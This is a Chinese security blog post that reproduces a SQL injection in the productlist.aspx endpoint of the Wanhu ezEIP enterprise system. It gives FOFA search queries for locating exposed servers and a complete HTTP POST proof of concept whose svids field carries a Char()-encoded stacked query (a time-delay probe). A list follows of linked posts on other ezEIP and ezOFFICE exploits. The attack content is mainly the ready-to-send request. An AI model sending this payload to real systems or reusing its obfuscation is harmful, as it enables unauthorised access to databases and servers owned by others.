万户ezEIP企业管理系统 productlist.aspx SQL注入漏洞

最新推荐文章于 2024-12-22 12:00:00 发布
最新推荐文章于 2024-12-22 12:00:00 发布
阅读量523 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: sql 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/user_hs/article/details/143029798

一、漏洞简介

万户ezEIP是一种企业资源规划软件,旨在帮助企业管理其各个方面的业务流程。它提供了一套集成的解决方案,涵盖了财务、供应链管理、销售和市场营销、人力资源等各个领域。

万户ezEIP企业管理系统 productlist.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

二、漏洞影响

万户ezEIP

三、网络测绘:

fofa:
body="ezEIP" || header="ezEIP" || body="css/css_whir.css"
product="万户网络-ezEIP"

四、复现过程

前置条件

步骤 POC 1

数据包

POST /shop/productlist.aspx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
 
ob=price&price=asc&svids=-1%29%3BDECLARE+%40%40proc_name+VARCHAR%28301%29%3BSet+%40%40proc_name%3DChar%28115%29%252bChar%28101%29%252bChar%28108%29%252bChar%28101%29%252bChar%2899%29%252bChar%28116%29%252bChar%2832%29%252bChar%2849%29%252bChar%2832%29%252bChar%28119%29%252bChar%28104%29%252bChar%28101%29%252bChar%28114%29%252bChar%28101%29%252bChar%2832%29%252bChar%2849%29%252bChar%2861%29%252bChar%2849%29%252bChar%2832%29%252bChar%2887%29%252bChar%2865%29%252bChar%2873%29%252bChar%2884%29%252bChar%2870%29%252bChar%2879%29%252bChar%2882%29%252bChar%2832%29%252bChar%2868%29%252bChar%2869%29%252bChar%2876%29%252bChar%2865%29%252bChar%2889%29%252bChar%2832%29%252bChar%2839%29%252bChar%2848%29%252bChar%2858%29%252bChar%2848%29%252bChar%2858%29%252bChar%2853%29%252bChar%2839%29%3BEXECUTE+%28%40%40proc_name%29%3B--a%2B
万户ezOFFICE senddocument_import.jsp任意文件上传
weixin_43567873的博客
03-05 201
万户ezOFFICE senddocument_import.jsp存在任意文件上传
万户协同办公平台 ezoffice存在未授权访问漏洞 附POC
nnn2188185的博客
08-29 801
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户ezoffice协同管理平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码。
万户ezEIP企业管理系统 productlist.aspx SQL注入漏洞复现
0xSec
10-17 1241
万户ezEIP企业管理系统 productlist.aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
万户ezEIP企业管理系统 /member/success.aspx 命令执行漏洞复现
0xSec
05-31 1402
万户ezEIP企业管理系统 /member/success.aspx 接口处存在命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执⾏代码,写⼊后⻔,获取服务器权限,进⽽控制整个web服务器。
万户ezEIP 前台aspx接口 反序列化漏洞
WuYSec的博客
06-06 920
万户ezEIP全网站门户管理系统是一个富含可扩展模块的便捷建站系统,系统拥有完善的多用户组权限管理和通用的前台信息内容管理,便于企业在运营网站时的多个管理角色对网站内容的协同管理。万户ezEIP存在反序列化漏洞,攻击者可以利用此漏洞执行任意命令,通过该漏洞可以获取服务器权限。
Goby 漏洞发布|万户ezEIP企业管理系统 /member/success.aspx 命令执行漏洞
m0_46699477的博客
05-31 743
万户ezEIP是一种企业资源规划软件,旨在帮助企业管理其各个方面的业务流程。它提供了一套集成的解决方案,涵盖了财务、供应链管理、销售和市场营销、人力资源等各个领域。攻击者可通过该漏洞在服务器端任意执⾏代码,写⼊后⻔,获取服务器权限,进⽽控制整个web服务器。
漏洞复现万户ezEIP企业管理系统 productlist.aspx SQL注入漏洞
最新发布
m0_71944965的博客
12-22 165
万户ezEIP企业管埋系统 productist. aspx 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
ezEIP信息泄露
「应无所住而生其心」
10-14 1629
道虽远,行则易至;儒虽难,坚为易成
products.aspx
dreamwell的专栏
07-08 713
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">http://www.w3.org/1999/xhtml" >     Products                                                          产品管理        
漏洞复现万户协同办公平台——反序列化
LongL_GuYu的博客
07-05 954
万户协同办公平台ezEIP是一个综合信息基础应用平台,其success.aspx接口存在反序列化漏洞,未授权攻击者可以直接利用此漏洞执行系统命令,获取服务器权限。
万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞 附POC
nnn2188185的博客
11-29 561
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发万户ezOFFICE集团版协同平台以工作流程、知识管理、沟通交流和辅助办公四大核心应用。
漏洞复现万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞 附POC
失心少年
11-30 776
漏洞链接:http://127.0.0.1/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!
万户OA text2Html接口存在任意文件读取漏洞
3tefanie的博客
12-19 1094
【一个人要有多少血性才算是个好人?】
asp.net电子商务系统 之三
szyzxcv5689的专栏
01-20 1825
在首页中点击产品列表中的项,如下图所示: 然后页面跳转到ProductsList.aspx页面.在ProductsList页面中,同样使用了ListView控件进行产品信息布局,实现了这个页面时,使用了Site.master母版页来控制页面的外观。如果用户从目录列表中单击产品目录后进入的话,将在查询字符串中传入CategoryID值来进行过滤,为了实现这个效果,需要定义where参数。Pro
zencart简易页面ezpage后台编辑位置
weixin_34326179的博客
10-29 161
zencart简易页面ezpage后台编辑位置: 后台-Tools(工具)-EZ-Pages(简易页面管理) 若编辑之后无法保存,说明includes\languages\语言包\html_includes目录及子目录下php文件不可写。 解决办法: 登录FTP,将html_includes目录及子目录下的php文件属性设为777即可。 为了安全,编辑完成之后,要将php文件属性设为75...
漏洞复现-万户ezOFFICE系列
aming小老弟
03-12 2315
万户OA[+]万户协同办公平台 ezoffice存在未授权访问漏洞wanhu_office|app=“万户ezOFFICE协同管理平台”万户ezEIP
复现万户ezoffice协同管理平台 任意文件读取漏洞_30
fushuang333的博客
01-27 718
复现万户ezoffice协同管理平台 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容
万户OA漏洞分析、利用与防护
不忘初心,护天下安全!
09-29 3539
万户OA 除了 /defaultroot/officeserverservlet 接口外的另一处接口 OfficeServer.jsp 同时也存在任意文件上传漏洞,导致攻击者可上传任意文件获取服务器权限。万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。万户OA download_old.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。2.使用防火墙等设备对所有相关poc进行检测、防护。可直接上传恶意jsp文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值